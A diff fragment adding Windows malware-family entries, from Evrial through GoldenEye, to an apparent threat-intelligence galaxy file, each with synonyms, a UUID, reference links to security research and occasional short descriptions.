+ "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.evrial", + "https://www.bleepingcomputer.com/news/security/evrial-trojan-switches-bitcoin-addresses-copied-to-windows-clipboard/" + ] + }, + "uuid": "af3a3ece-e67f-457a-be72-7651bc720342", + "value": "Evrial", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Sabresac", + "Saber" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.excalibur", + "https://blog.cylance.com/digitally-signed-malware-targeting-gaming-companies" + ] + }, + "uuid": "3cec2c3c-1669-40cf-8612-eb826f7d2c98", + "value": "Excalibur", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.exchange_tool", + "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/", + "https://github.com/nccgroup/Royal_APT" + ] + }, + "uuid": "74f8db32-799c-41e5-9815-6272908ede57", + "value": "MS Exchange Tool", + "description": "" + }, + { + "meta": { + "synonyms": [ + "ExtRat" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.extreme_rat", + "https://www.fireeye.com/blog/threat-research/2014/02/xtremerat-nuisance-or-threat.html", + "https://malware.lu/articles/2012/07/22/xtreme-rat-analysis.html", + "https://community.rsa.com/community/products/netwitness/blog/2017/08/02/malspam-delivers-xtreme-rat-8-1-2017", + "https://www.symantec.com/connect/blogs/colombians-major-target-email-campaigns-delivering-xtreme-rat" + ] + }, + "uuid": "6ec2b6b1-c1a7-463a-b135-edb51764cf38", + "value": "Xtreme RAT", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.eye_pyramid", + "https://securelist.com/blog/incidents/77098/the-eyepyramid-attacks/", + "http://blog.talosintel.com/2017/01/Eye-Pyramid.html" + ] + }, + "uuid": "a7489029-21d4-44c9-850a-8f656a98cb22", + "value": "Eye Pyramid", + "description": "" + }, + { + "meta": { + "synonyms": [ + "WillExec" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.fakedga", + "https://github.com/360netlab/DGA/issues/36", + "http://blog.talosintelligence.com/2017/10/threat-round-up-1020-1017.html", + "http://www.freebuf.com/column/153424.html" + ] + }, + "uuid": "31c248cb-51b5-4bb7-801f-d8520d2b5789", + "value": "FakeDGA", + "description": "According to Talos, this trojan injects into other processes, disables security features and tries to contact several domains, waiting for instruction.\r\n\r\nThere seem to be two versions of this malware: one with the FakeDGA-domains in plaintext, and one with AES-ECB-encrypted domains (using the Windows-API)." + }, + { + "meta": { + "synonyms": [ + "Braviax" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.fakerean", + "https://blog.threattrack.com/fakerean-comes-of-age-turns-hard-core/", + "https://0x3asecurity.wordpress.com/2015/11/30/134260124544/", + "https://www.exploit-db.com/docs/english/18387-malware-reverse-engineering-part-1---static-analysis.pdf", + "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Win32/FakeRean#technicalDiv" + ] + }, + "uuid": "653df134-88c9-47e2-99a5-06e0406ab6d4", + "value": "FakeRean", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.faketc", + "http://www.welivesecurity.com/2015/07/30/operation-potao-express/" + ] + }, + "uuid": "6b0030bc-6e45-43b0-9175-15fe8fbd0942", + "value": "FakeTC", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.fanny", + "https://securelist.com/equation-the-death-star-of-malware-galaxy/68750/#_1" + ] + }, + "uuid": "6d441619-c5f5-45ff-bc63-24cecd0b237e", + "value": "Fanny", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.fantomcrypt", + "https://www.webroot.com/blog/2016/08/29/fantom-ransomware-windows-update/" + ] + }, + "uuid": "29f4ae5a-4ccd-451b-bd3e-d301865da034", + "value": "FantomCrypt", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.fast_pos", + "http://documents.trendmicro.com/assets/fastPOS-quick-and-easy-credit-card-theft.pdf", + "https://blog.trendmicro.com/trendlabs-security-intelligence/fastpos-updates-in-time-for-retail-sale-season/", + "http://documents.trendmicro.com/assets/Appendix%20-%20FastPOS%20Updates%20in%20Time%20for%20the%20Retail%20Sale%20Season.pdf" + ] + }, + "uuid": "1bf03bbb-d3a2-4713-923b-218186c86914", + "value": "FastPOS", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.felismus", + "https://www.symantec.com/connect/blogs/sowbug-cyber-espionage-group-targets-south-american-and-southeast-asian-governments" + ] + }, + "uuid": "07a41ea7-17b2-4852-bfd7-54211c477dc0", + "value": "Felismus", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.felixroot", + "https://medium.com/@Sebdraven/when-a-malware-is-more-complex-than-the-paper-5822fc7ff257", + "https://www.fireeye.com/blog/threat-research/2018/07/microsoft-office-vulnerabilities-used-to-distribute-felixroot-backdoor.html" + ] + }, + "uuid": "e58755ac-3d0c-4ed3-afeb-e929816c8018", + "value": "Felixroot", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Cridex", + "Bugat" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.feodo", + "http://contagiodump.blogspot.com/2012/08/cridex-analysis-using-volatility-by.html", + "https://feodotracker.abuse.ch/", + "https://securelist.com/analysis/publications/78531/dridex-a-history-of-evolution/", + "http://www.sempersecurus.org/2012/08/cridex-analysis-using-volatility.html" + ] + }, + "uuid": "66781866-f064-467d-925d-5e5f290352f0", + "value": "Feodo", + "description": "Feodo (also known as Cridex or Bugat) is a Trojan used to commit e-banking fraud and to steal sensitive information from the victims computer, such as credit card details or credentials." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ff_rat", + "https://www.cylance.com/en_us/blog/breaking-down-ff-rat-malware.html" + ] + }, + "uuid": "e701b875-8ade-434f-89ff-6c367099bfd8", + "value": "FF RAT", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.fileice_ransom", + "https://www.bleepingcomputer.com/news/security/in-dev-ransomware-forces-you-do-to-survey-before-unlocking-computer/" + ] + }, + "uuid": "ed0b8ac9-973b-4aaa-9904-8c7ed2e73933", + "value": "FileIce", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Poseidon" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.findpos", + "https://researchcenter.paloaltonetworks.com/2015/03/findpos-new-pos-malware-family-discovered/", + "https://blogs.cisco.com/security/talos/poseidon" + ] + }, + "uuid": "ae914b9a-67a2-425d-bef0-3a9624a207ba", + "value": "FindPOS", + "description": "" + }, + { + "meta": { + "synonyms": [ + "FinSpy" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.finfisher", + "https://artemonsecurity.blogspot.de/2017/01/finfisher-rootkit-analysis.html", + "https://www.fireeye.com/blog/threat-research/2017/09/zero-day-used-to-distribute-finspy.html", + "https://www.welivesecurity.com/2017/09/21/new-finfisher-surveillance-campaigns/", + "https://securelist.com/blackoasis-apt-and-new-targeted-attacks-leveraging-zero-day-exploit/82732/", + "http://www.msreverseengineering.com/blog/2018/1/23/a-walk-through-tutorial-with-code-on-statically-unpacking-the-finspy-vm-part-one-x86-deobfuscation", + "https://www.welivesecurity.com/wp-content/uploads/2018/01/WP-FinFisher.pdf", + "https://cloudblogs.microsoft.com/microsoftsecure/2018/03/01/finfisher-exposed-a-researchers-tale-of-defeating-traps-tricks-and-complex-virtual-machines/" + ] + }, + "uuid": "541b64bc-87ec-4cc2-aaee-329355987853", + "value": "FinFisher RAT", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.fireball", + "http://blog.checkpoint.com/2017/06/01/fireball-chinese-malware-250-million-infection/" + ] + }, + "uuid": "9ad28356-184c-4f02-89f5-1b70981598c3", + "value": "Fireball", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.firecrypt", + "https://www.bleepingcomputer.com/news/security/firecrypt-ransomware-comes-with-a-ddos-component/" + ] + }, + "uuid": "c4346ed0-1d74-4476-a78c-299bce0409bd", + "value": "FireCrypt", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.firemalv", + "https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf" + ] + }, + "uuid": "9715c6bc-4b1e-49a2-b1d8-db4f4c4f042c", + "value": "FireMalv", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.first_ransom", + "https://twitter.com/JaromirHorejsi/status/815949909648150528" + ] + }, + "uuid": "1ab17959-6254-49af-af26-d34e87073e49", + "value": "FirstRansom", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.flawedammyy", + "https://github.com/Coldzer0/Ammyy-v3", + "https://secrary.com/ReversingMalware/AMMY_RAT_Downloader/", + "https://www.proofpoint.com/us/threat-insight/post/leaked-source-code-ammyy-admin-turned-flawedammyy-rat", + "https://www.proofpoint.com/us/threat-insight/post/ta505-abusing-settingcontent-ms-within-pdf-files-distribute-flawedammyy-rat" + ] + }, + "uuid": "18419355-fd28-41a6-bffe-2df68a7166c4", + "value": "FlawedAmmyy", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.flexispy", + "https://www.randhome.io/blog/2017/04/23/lets-talk-about-flexispy/" + ] + }, + "uuid": "4305d59a-0d07-4021-a902-e7996378898b", + "value": "FlexiSpy", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.floki_bot", + "http://blog.talosintel.com/2016/12/flokibot-collab.html#more", + "https://www.cylance.com/en_us/blog/threat-spotlight-flokibot-pos-malware.html", + "https://blog.malwarebytes.com/threat-analysis/2016/11/floki-bot-and-the-stealthy-dropper/", + "http://adelmas.com/blog/flokibot.php", + "https://www.arbornetworks.com/blog/asert/flokibot-invades-pos-trouble-brazil/", + "https://www.arbornetworks.com/blog/asert/flokibot-flock-bots/", + "https://www.flashpoint-intel.com/blog/cybercrime/floki-bot-emerges-new-malware-kit/", + "https://www.flashpoint-intel.com/flokibot-curious-case-brazilian-connector/" + ] + }, + "uuid": "057ff707-a008-4ab8-8370-22b689ed3412", + "value": "FlokiBot", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.floxif", + "https://www.virusbulletin.com/virusbulletin/2012/12/compromised-library" + ] + }, + "uuid": "b1b2e501-b68f-4e2e-ab98-85e9bda0fbcd", + "value": "Floxif", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.flusihoc", + "https://www.arbornetworks.com/blog/asert/the-flusihoc-dynasty-a-long-standing-ddos-botnet/" + ] + }, + "uuid": "79e9df7d-abc8-45bd-abd3-be9b975f1a03", + "value": "Flusihoc", + "description": "Available since 2015, Flusihoc is a versatile C++ malware capable of a variety of DDoS attacks as directed by a Command and Control server. Flusihoc communicates with its C2 via HTTP in plain text." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.fobber", + "http://blog.wizche.ch/fobber/malware/analysis/2015/08/10/fobber-encryption.html", + "http://www.govcert.admin.ch/downloads/whitepapers/govcertch_fobber_analysis.pdf", + "https://blog.malwarebytes.com/threat-analysis/2015/06/elusive-hanjuan-ek-caught-in-new-malvertising-campaign/", + "https://www.govcert.admin.ch/blog/12/analysing-a-new-ebanking-trojan-called-fobber", + "http://byte-atlas.blogspot.ch/2015/08/knowledge-fragment-unwrapping-fobber.html" + ] + }, + "uuid": "bb836040-c161-4932-8f89-bc2ca2e8c1c0", + "value": "Fobber", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook", + "https://www.fireeye.com/blog/threat-research/2017/10/formbook-malware-distribution-campaigns.html", + "http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/", + "http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html", + "https://www.arbornetworks.com/blog/asert/formidable-formbook-form-grabber/", + "https://thisissecurity.stormshield.com/2018/03/29/in-depth-formbook-malware-analysis-obfuscation-and-process-injection/", + "http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html", + "https://blog.talosintelligence.com/2018/06/my-little-formbook.html" + ] + }, + "uuid": "8378b417-605e-4196-b31f-a0c96d75aa50", + "value": "Formbook", + "description": "FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called \"Babushka Crypter\" by Insidemalware." + }, + { + "meta": { + "synonyms": [ + "ffrat" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.former_first_rat", + "https://researchcenter.paloaltonetworks.com/2015/04/unit-42-identifies-new-dragonok-backdoor-malware-deployed-against-japanese-targets/" + ] + }, + "uuid": "9aacd2c7-bcd6-4a82-8250-cab2e4e2d402", + "value": "FormerFirstRAT", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.freenki", + "https://researchcenter.paloaltonetworks.com/2017/10/unit42-freemilk-highly-targeted-spear-phishing-campaign/", + "http://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html" + ] + }, + "uuid": "f86b675a-b7b2-4a40-b4fd-f62fd96440f1", + "value": "Freenki Loader", + "description": "" + }, + { + "meta": { + "synonyms": [ + "BitPaymer" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.friedex", + "https://www.welivesecurity.com/2018/01/26/friedex-bitpaymer-ransomware-work-dridex-authors/" + ] + }, + "uuid": "58ae14a9-c4aa-490c-8404-0eb590f5650d", + "value": "FriedEx", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.furtim", + "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=4341&sid=af76b944112a234fa933cc934d21cd9f", + "https://sentinelone.com/blogs/sfg-furtims-parent/" + ] + }, + "uuid": "c9d78931-318c-4b34-af33-c90f6612a4f1", + "value": "Furtim", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.galaxyloader" + ] + }, + "uuid": "c12f1363-2bc8-4ffb-8f31-cbb5f85e0ffe", + "value": "GalaxyLoader", + "description": "GalaxyLoader is a simple .NET loader. Its name stems from the .pdb and the function naming.\r\n\r\nIt seems to make use of iplogger.com for tracking.\r\nIt employed WMI to check the system for\r\n- IWbemServices::ExecQuery - SELECT * FROM Win32_Processor\r\n- IWbemServices::ExecQuery - select * from Win32_VideoController\r\n- IWbemServices::ExecQuery - SELECT * FROM AntivirusProduct\r\n" + }, + { + "meta": { + "synonyms": [ + "pios" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.gamapos", + "http://documents.trendmicro.com/assets/GamaPOS_Technical_Brief.pdf" + ] + }, + "uuid": "8f785ee5-1663-4972-9a64-f02e7c46ba66", + "value": "gamapos", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.gameover_dga" + ] + }, + "uuid": "c4afb7c6-cfba-40d7-aa79-a2829828ed92", + "value": "Gameover DGA", + "description": "" + }, + { + "meta": { + "synonyms": [ + "ZeuS P2P", + "GOZ" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.gameover_p2p", + "https://www.wired.com/?p=2171700", + "https://www.fox-it.com/nl/wp-content/uploads/sites/12/FoxIT-Whitepaper_Blackhat-web.pdf", + "http://www.syssec-project.eu/m/page-media/3/zeus_malware13.pdf", + "https://www.justice.gov/opa/pr/us-leads-multi-national-action-against-gameover-zeus-botnet-and-cryptolocker-ransomware", + "https://www.cert.pl/wp-content/uploads/2015/12/2013-06-p2p-rap_en.pdf" + ] + }, + "uuid": "ffc8c386-e9d6-4889-afdf-ebf37621bc4f", + "value": "Gameover P2P", + "description": "Gameover ZeuS is a peer-to-peer botnet based on components from the earlier ZeuS trojan. According to a report by Symantec, Gameover Zeus has largely been used for banking fraud and distribution of the CryptoLocker ransomware. In early June 2014, the U.S. Department of Justice announced that an international inter-agency collaboration named Operation Tovar had succeeded in temporarily cutting communication between Gameover ZeuS and its command and control servers." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.gamotrol" + ] + }, + "uuid": "9664712b-81f1-4c52-ad4d-a657a120fded", + "value": "Gamotrol", + "description": "" + }, + { + "meta": { + "synonyms": [ + "GrandCrab" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.gandcrab", + "https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-being-distributed-via-malspam-disguised-as-receipts/", + "https://labs.bitdefender.com/2018/02/gandcrab-ransomware-decryption-tool-available-for-free/", + "https://sensorstechforum.com/killswitch-file-now-available-gandcrab-v4-1-2-ransomware/", + "http://asec.ahnlab.com/1145", + "http://www.vmray.com/cyber-security-blog/gandcrab-ransomware-evolution-analysis/", + "https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-distributed-by-exploit-kits-appends-gdcb-extension/", + "https://isc.sans.edu/diary/23417", + "https://blog.talosintelligence.com/2018/05/gandcrab-compromised-sites.html", + "http://csecybsec.com/download/zlab/20181001_CSE_GandCrabv5.pdf", + "https://blog.malwarebytes.com/threat-analysis/2018/01/gandcrab-ransomware-distributed-by-rig-and-grandsoft-exploit-kits/" + ] + }, + "uuid": "a8d83baa-cf2e-4329-92d7-06c8ccdeb275", + "value": "win.gandcrab", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.gaudox", + "http://nettoolz.blogspot.ch/2016/03/gaudox-http-bot-1101-casm-ring3-rootkit.html" + ] + }, + "uuid": "591b2882-65ba-4629-9008-51ed3467510a", + "value": "Gaudox", + "description": "Gaudox is a http loader, written in C/C++. The author claims to have put much effort into making this bot efficient and stable. Its rootkit functionality hides it in Windows Explorer (32bit only)." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.gauss", + "http://contagiodump.blogspot.com/2012/08/gauss-samples-nation-state-cyber.html" + ] + }, + "uuid": "5f8be453-8f73-47a2-9c9f-e8b9b02f5691", + "value": "Gauss", + "description": "" + }, + { + "meta": { + "synonyms": [ + "WhiteBear" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.gazer", + "https://www.welivesecurity.com/2017/08/30/eset-research-cyberespionage-gazer/", + "https://securelist.com/introducing-whitebear/81638/", + "https://www.youtube.com/watch?v=Pvzhtjl86wc", + "https://download.bitdefender.com/resources/files/News/CaseStudies/study/115/Bitdefender-Whitepaper-PAC-A4-en-EN1.pdf", + "https://github.com/eset/malware-ioc/tree/master/turla" + ] + }, + "uuid": "0a3047b3-6a38-48ff-8f9c-49a5c28e3ada", + "value": "Gazer", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.gcman", + "https://securelist.com/apt-style-bank-robberies-increase-with-metel-gcman-and-carbanak-2-0-attacks/73638/" + ] + }, + "uuid": "ed0586d1-4ff0-4d39-87c7-1414f600d16e", + "value": "gcman", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.gearinformer", + "https://wapacklabs.blogspot.ch/2017/02/rebranding-ispy-keylogger-gear-informer.html", + "https://www.rekings.com/ispy-customers/" + ] + }, + "uuid": "5e699f4d-9ff6-49dd-bc04-797f0ab2e128", + "value": "GearInformer", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Emotet", + "Heodo" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.geodo", + "https://malfind.com/index.php/2018/07/23/deobfuscating-emotets-powershell-payload/", + "http://blog.trendmicro.com/trendlabs-security-intelligence/emotet-returns-starts-spreading-via-spam-botnet/", + "https://www.fortinet.com/blog/threat-research/deep-analysis-of-new-emotet-variant-part-2.html", + "https://blog.kryptoslogic.com/malware/2018/08/01/emotet.html", + "https://securelist.com/analysis/publications/69560/the-banking-trojan-emotet-detailed-analysis/", + "https://cloudblogs.microsoft.com/microsoftsecure/2017/11/06/mitigating-and-eliminating-info-stealing-qakbot-and-emotet-in-corporate-networks/?source=mmpc", + "https://research.checkpoint.com/emotet-tricky-trojan-git-clones/", + "https://www.cert.pl/en/news/single/analysis-of-emotet-v4/", + "https://www.fidelissecurity.com/threatgeek/2017/07/emotet-takes-wing-spreader", + "https://www.us-cert.gov/ncas/alerts/TA18-201A", + "https://www.intezer.com/mitigating-emotet-the-most-common-banking-trojan/", + "https://www.symantec.com/blogs/threat-intelligence/evolution-emotet-trojan-distributor", + "https://feodotracker.abuse.ch/?filter=version_e", + "https://www.gdata.de/blog/2017/10/30110-emotet-beutet-outlook-aus", + "https://blog.trendmicro.com/trendlabs-security-intelligence/new-emotet-hijacks-windows-api-evades-sandbox-analysis/", + "http://blog.fortinet.com/2017/05/03/deep-analysis-of-new-emotet-variant-part-1" + ] + }, + "uuid": "d29eb927-d53d-4af2-b6ce-17b3a1b34fe7", + "value": "Geodo", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.getmail", + "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" + ] + }, + "uuid": "6f155c95-3090-4730-8d3b-0b246162a83a", + "value": "GetMail", + "description": "" + }, + { + "meta": { + "synonyms": [ + "getmypos" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.getmypass", + "https://securitykitten.github.io/2014/11/26/getmypass-point-of-sale-malware.html", + "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/the-evolution-of-point-of-sale-pos-malware", + "https://blog.trendmicro.com/trendlabs-security-intelligence/new-pos-malware-kicks-off-holiday-shopping-weekend/", + "https://securitykitten.github.io/2015/01/08/getmypass-point-of-sale-malware-update.html" + ] + }, + "uuid": "d77eacf7-090f-4cf6-a305-79a372241158", + "value": "GetMyPass", + "description": "" + }, + { + "meta": { + "synonyms": [ + "CoreImpact (Modified)" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ghole", + "https://www.clearskysec.com/gholee-a-protective-edge-themed-spear-phishing-campaign/", + "http://www.trendmicro.it/media/wp/operation-woolen-goldfish-whitepaper-en.pdf", + "https://www.coresecurity.com/core-impact" + ] + }, + "uuid": "ef4383f6-29fd-4b06-9a1f-b788567fd8fd", + "value": "Ghole", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Remosh" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ghostnet", + "http://contagiodump.blogspot.com/2011/07/jul-25-mac-olyx-gh0st-backdoor-in-rar.html", + "https://en.wikipedia.org/wiki/GhostNet" + ] + }, + "uuid": "e1410684-c695-4c89-ae5f-80ced136afbd", + "value": "Gh0stnet", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Ghost iBot" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ghost_admin", + "https://www.bleepingcomputer.com/news/security/new-ghostadmin-malware-used-for-data-theft-and-exfiltration/", + "https://www.cylance.com/en_us/blog/threat-spotlight-ghostadmin.html" + ] + }, + "uuid": "6201c337-1599-4ced-be9e-651a624c20be", + "value": "GhostAdmin", + "description": "" + }, + { + "meta": { + "synonyms": [ + "PCRat", + "Gh0st RAT" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ghost_rat", + "https://labs.bitdefender.com/2018/02/operation-pzchao-a-possible-return-of-the-iron-tiger-apt/", + "http://download01.norman.no/documents/ThemanyfacesofGh0stRat.pdf", + "https://www.proofpoint.com/us/threat-insight/post/north-korea-bitten-bitcoin-bug-financially-motivated-campaigns-reveal-new", + "https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug.pdf", + "http://www.malware-traffic-analysis.net/2018/01/04/index.html", + "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/april/decoding-network-data-from-a-gh0st-rat-variant/", + "http://www.hexblog.com/?p=1248", + "https://blog.cylance.com/the-ghost-dragon" + ] + }, + "uuid": "225fa6cf-dc9c-4b86-873b-cdf1d9dd3738", + "value": "Ghost RAT", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Wordpress Bruteforcer" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.glasses", + "https://forum.exploit.in/pda/index.php/t102378.html" + ] + }, + "uuid": "1c27b1a3-ea2a-45d2-a982-12e1509aa4ad", + "value": "Glasses", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.glassrat", + "https://community.rsa.com/community/products/netwitness/blog/2015/11/25/detecting-glassrat-using-security-analytics-and-ecat" + ] + }, + "uuid": "d9e6adf2-4f31-48df-a7ef-cf25d299f68c", + "value": "GlassRAT", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.globeimposter", + "https://blog.ensilo.com/globeimposter-ransomware-technical", + "https://www.acronis.com/en-us/blog/posts/globeimposter-ransomware-holiday-gift-necurs-botnet", + "https://www.bleepingcomputer.com/news/security/new-doc-globeimposter-ransomware-variant-malspam-campaign-underway/", + "https://blog.fortinet.com/2017/08/05/analysis-of-new-globeimposter-ransomware-variant", + "https://info.phishlabs.com/blog/globe-imposter-ransomware-makes-a-new-run", + "https://isc.sans.edu/diary/23417" + ] + }, + "uuid": "73806c57-cef8-4f7b-a78b-7949ef83b2c2", + "value": "GlobeImposter", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.globe_ransom" + ] + }, + "uuid": "de8e204c-fb65-447e-92bd-200e1c39648c", + "value": "Globe", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.glooxmail", + "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" + ] + }, + "uuid": "18208674-fe8c-447f-9e1d-9ff9a64b2370", + "value": "GlooxMail", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.glupteba", + "https://www.welivesecurity.com/2011/03/02/tdl4-and-glubteba-piggyback-piggybugs/", + "https://www.welivesecurity.com/2014/03/18/operation-windigo-the-vivisection-of-a-large-linux-server-side-credential-stealing-malware-campaign/", + "https://www.welivesecurity.com/2018/03/22/glupteba-no-longer-windigo/", + "http://malwarefor.me/2015-04-13-nuclear-ek-glupteba-and-operation-windigo/", + "http://resources.infosecinstitute.com/tdss4-part-1/" + ] + }, + "uuid": "978cfb82-5fe9-46d2-9607-9bcdfeaaa58c", + "value": "win.glupteba", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.godzilla_loader", + "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=4349&p=28427#p28346" + ] + }, + "uuid": "9cfdc3ea-c838-4ac5-bff2-57c92ec24b48", + "value": "Godzilla Loader", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.goggles", + "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" + ] + }, + "uuid": "7d89e8dc-4999-47e9-b497-b476e368a8d2", + "value": "Goggles", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Petya/Mischa" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.goldeneye", + 